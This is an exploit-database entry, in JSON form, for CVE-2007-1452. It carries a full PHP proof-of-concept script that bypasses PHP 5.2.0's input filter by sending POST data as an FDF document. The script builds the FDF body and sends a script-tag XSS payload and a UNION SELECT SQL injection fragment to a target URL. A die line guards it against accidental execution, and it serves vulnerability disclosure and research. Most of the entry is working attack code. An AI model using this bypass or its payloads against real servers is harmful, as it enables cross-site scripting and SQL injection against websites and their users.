PHP 5.2.0 - EXT/Filter FDF Post Filter Bypass

2007-03-10T00:00:00

Description

{"id": "EDB-ID:3452", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP 5.2.0 - EXT/Filter FDF Post Filter Bypass", "description": "", "published": "2007-03-10T00:00:00", "modified": "2007-03-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/3452", "reporter": "Stefan Esser", "references": [], "cvelist": ["2007-1452"], "immutableFields": [], "lastseen": "2022-08-16T09:37:23", "viewCount": 32, "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "_state": {"dependencies": 1661182887, "score": 1661176728, "epss": 1678791570}, "_internal": {"score_hash": "0795e1664b85ce5d4569dc164c72f3a7"}, "sourceHref": "https://www.exploit-db.com/download/3452", "sourceData": "<?php\r\n ////////////////////////////////////////////////////////////////////////\r\n // _ _ _ _ ___ _ _ ___ //\r\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\r\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\r\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\r\n // //\r\n // Proof of concept code from the Hardened-PHP Project //\r\n // (C) Copyright 2007 Stefan Esser //\r\n // //\r\n ////////////////////////////////////////////////////////////////////////\r\n // PHP ext/filtet FDF POST Filter Bybass Exploit //\r\n ////////////////////////////////////////////////////////////////////////\r\n\r\n // This is meant as a protection against remote file inclusion.\r\n die(\"REMOVE THIS LINE\");\r\n\r\n // _POST is the array that will be sent to the url in $url\r\n $_POST = array();\r\n $_POST['var1'] = \"<script>alert(/XSS/);</script>\";\r\n $_POST['var2'] = \" ' UNION SELECT \";\r\n\r\n $url = \"http://127.0.0.1/info.php\"; \r\n \r\n // You do not need to change anything below this\r\n \r\n $outfdf = fdf_create();\r\n foreach ($_POST as $key => $value) {\r\n fdf_set_value($outfdf, $key, $value, 0);\r\n }\r\n fdf_save($outfdf, \"outtest.fdf\");\r\n fdf_close($outfdf);\r\n \r\n $ret = file_get_contents(\"outtest.fdf\");\r\n unlink(\"outtest.fdf\");\r\n \r\n $params = array('http' => array(\r\n 'method' => 'POST',\r\n 'content' => $ret,\r\n 'header' => 'Content-Type: application/vnd.fdf'\r\n ));\r\n \r\n $ctx = stream_context_create($params);\r\n $fp = @fopen($url, 'rb', false, $ctx);\r\n if (!$fp) {\r\n die(\"Cannot open $url\");\r\n }\r\n $response = @stream_get_contents($fp); \r\n\r\n echo $response;\r\n echo \"\\n\";\r\n?> \r\n\r\n# milw0rm.com [2007-03-10]", "osvdbidlist": ["33931"], "exploitType": "remote", "verified": true}